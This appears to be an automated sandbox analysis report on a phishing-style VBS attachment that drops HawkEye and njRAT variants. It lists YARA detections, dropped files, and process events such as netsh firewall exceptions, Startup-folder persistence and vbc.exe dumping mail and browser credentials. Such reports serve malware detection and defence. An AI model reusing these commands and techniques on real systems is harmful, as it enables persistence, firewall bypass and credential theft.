Source: 13.2.tmpFB21.tmp.exe.8150000.11.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.tmpFB21.tmp.exe.8100000.10.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.tmpFB21.tmp.exe.3068cf8.5.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research

Source: Tmp.exe.0.dr, SlayerRAT.cs	Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: servieda.exe.1.dr, SlayerRAT.cs	Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 1.0.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs	Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 1.2.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs	Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, SlayerRAT.cs	Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 3.2.servieda.exe.a0000.0.unpack, SlayerRAT.cs	Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 3.0.servieda.exe.a0000.0.unpack, SlayerRAT.cs	Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, SlayerRAT.cs	Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'

Source: classification engine

Classification label: mal100.phis.troj.adwa.spyw.evad.winVBS@22/17@5/5

Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Code function: 2_2_0498268E AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Code function: 2_2_04982657 AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC54FA AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC54C3 AdjustTokenPrivileges,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 14_2_0040ED0B FindResourceA,SizeofResource,LoadResource,LockResource,

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\codigo[1].txt

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4860:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:956:120:WilError_01
Source: C:\Users\user\AppData\Roaming\servieda.exe	Mutant created: \Sessions\1\BaseNamedObjects\d4c6a6df7bab3dad31763de990c4ed82

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\Tmp.exe

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PaymentNotification.vbs'

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\servieda.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\servieda.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\servieda.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

System information queried: HandleInformation

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: PaymentNotification.vbs	Virustotal: Detection: 12%
Source: PaymentNotification.vbs	ReversingLabs: Detection: 17%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PaymentNotification.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Tmp.exe 'C:\Users\user\AppData\Local\Temp\Tmp.exe'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\pgr.exe 'C:\Users\user\AppData\Local\Temp\pgr.exe'
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process created: C:\Users\user\AppData\Roaming\servieda.exe 'C:\Users\user\AppData\Roaming\servieda.exe'
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE
Source: C:\Windows\System32\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\pgr.exe' 'pgr.exe' ENABLE
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe'
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe'
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe'
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Tmp.exe 'C:\Users\user\AppData\Local\Temp\Tmp.exe'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\pgr.exe 'C:\Users\user\AppData\Local\Temp\pgr.exe'
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process created: C:\Users\user\AppData\Roaming\servieda.exe 'C:\Users\user\AppData\Roaming\servieda.exe'
